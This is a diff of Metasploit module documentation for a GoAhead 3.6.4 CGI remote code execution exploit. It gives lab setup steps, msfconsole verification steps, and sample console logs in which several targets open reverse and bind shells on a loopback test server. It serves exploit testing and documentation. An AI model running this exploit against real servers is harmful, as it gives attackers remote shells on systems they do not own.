Documentation update
@@ -16,7 +16,7 @@ git checkout tags/v3.6.4 -q
|
||||
make > /dev/null
|
||||
cd test
|
||||
gcc ./cgitest.c -o cgi-bin/cgitest
|
||||
sudo ../build/linux-x64-default/bin/goahead
|
||||
../build/linux-x64-default/bin/goahead . 127.1.1.1:8080
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
@@ -25,7 +25,7 @@ sudo ../build/linux-x64-default/bin/goahead
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/linux/http/goahead_cgi_exec```
|
||||
3. Do: ```use exploit/linux/http/goahead_ldpreload```
|
||||
4. Do: ```set rhost [ip]```
|
||||
5. Do: ```exploit```
|
||||
6. You should get a shell.
|
||||
@@ -41,21 +41,76 @@ sudo ../build/linux-x64-default/bin/goahead
|
||||
### GoAhead 3.6.4 on Ubuntu 16.04 x64
|
||||
|
||||
```
|
||||
[*] Processing goahead.rc for ERB directives.
|
||||
resource (goahead.rc)> use exploit/linux/http/goahead_cgi_exec
|
||||
resource (goahead.rc)> set verbose true
|
||||
verbose => true
|
||||
resource (goahead.rc)> set rhost 127.1.1.1
|
||||
rhost => 127.1.1.1
|
||||
resource (goahead.rc)> check
|
||||
<TBD>
|
||||
resource (goahead.rc)> exploit
|
||||
[*] Started reverse TCP handler on 127.1.1.1:4444
|
||||
[*] Sending Exploit to /cgi-bin/cgitest
|
||||
[*] Command shell session 1 opened (127.1.1.1:4444 -> 127.1.1.1:45762) at 2017-12-23 17:12:39 -0500
|
||||
uname -a
|
||||
Linux goahead 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
|
||||
|
||||
whoami
|
||||
root
|
||||
msf> use exploit/linux/http/goahead_preload
|
||||
msf exploit(goahead_ldpreload) > set RHOST 127.1.1.1
|
||||
msf exploit(goahead_ldpreload) > set RPORT 8080
|
||||
msf exploit(goahead_ldpreload) > check
|
||||
|
||||
[*] Searching 390 paths for an exploitable CGI endpoint...
|
||||
[+] Exploitable CGI located at /cgi-bin/cgitest
|
||||
[+] 127.1.1.1:8080 The target is vulnerable.
|
||||
|
||||
msf exploit(goahead_ldpreload) > exploit
|
||||
|
||||
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
|
||||
[*] Started reverse TCP handler on 127.0.0.1:4444
|
||||
[*] Searching 390 paths for an exploitable CGI endpoint...
|
||||
[+] Exploitable CGI located at /cgi-bin/cgitest
|
||||
[*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:32988) at 2017-12-28 16:26:50 -0600
|
||||
|
||||
uname -a
|
||||
Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
|
||||
exit
|
||||
|
||||
msf exploit(goahead_ldpreload) > set TARGET 1
|
||||
msf exploit(goahead_ldpreload) > unset PAYLOAD
|
||||
msf exploit(goahead_ldpreload) > exploit
|
||||
|
||||
[*] Started bind handler
|
||||
[*] Searching 390 paths for an exploitable CGI endpoint...
|
||||
[+] Exploitable CGI located at /cgi-bin/cgitest
|
||||
[*] Command shell session 5 opened (127.0.0.1:30836 -> 127.1.1.1:4444) at 2017-12-28 16:28:04 -0600
|
||||
|
||||
uname -a
|
||||
Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
|
||||
exit
|
||||
|
||||
msf exploit(goahead_ldpreload) > set TARGET 2
|
||||
msf exploit(goahead_ldpreload) > unset PAYLOAD
|
||||
msf exploit(goahead_ldpreload) > exploit
|
||||
|
||||
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
|
||||
[*] Started reverse TCP double handler on 127.0.0.1:4444
|
||||
[*] Searching 390 paths for an exploitable CGI endpoint...
|
||||
[+] Exploitable CGI located at /cgi-bin/cgitest
|
||||
[*] Accepted the first client connection...
|
||||
[*] Accepted the second client connection...
|
||||
[*] Command: echo sNRXNjxWl7ic0uWw;
|
||||
[*] Writing to socket A
|
||||
[*] Writing to socket B
|
||||
[*] Reading from sockets...
|
||||
[*] Reading from socket B
|
||||
[*] B: "sNRXNjxWl7ic0uWw\r\n"
|
||||
[*] Matching...
|
||||
[*] A is input...
|
||||
[*] Command shell session 6 opened (127.0.0.1:4444 -> 127.0.0.1:32995) at 2017-12-28 16:28:56 -0600
|
||||
|
||||
uname -a
|
||||
Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
|
||||
|
||||
|
||||
msf exploit(goahead_ldpreload) > set TARGET 4
|
||||
msf exploit(goahead_ldpreload) > unset PAYLOAD
|
||||
msf exploit(goahead_ldpreload) > exploit
|
||||
|
||||
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
|
||||
[*] Started reverse TCP handler on 127.0.0.1:4444
|
||||
[*] Searching 390 paths for an exploitable CGI endpoint...
|
||||
[+] Exploitable CGI located at /cgi-bin/cgitest
|
||||
[*] Command shell session 7 opened (127.0.0.1:4444 -> 127.0.0.1:33000) at 2017-12-28 16:29:34 -0600
|
||||
|
||||
uname -a
|
||||
Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
|
||||
|
||||
```
|
||||
|
||||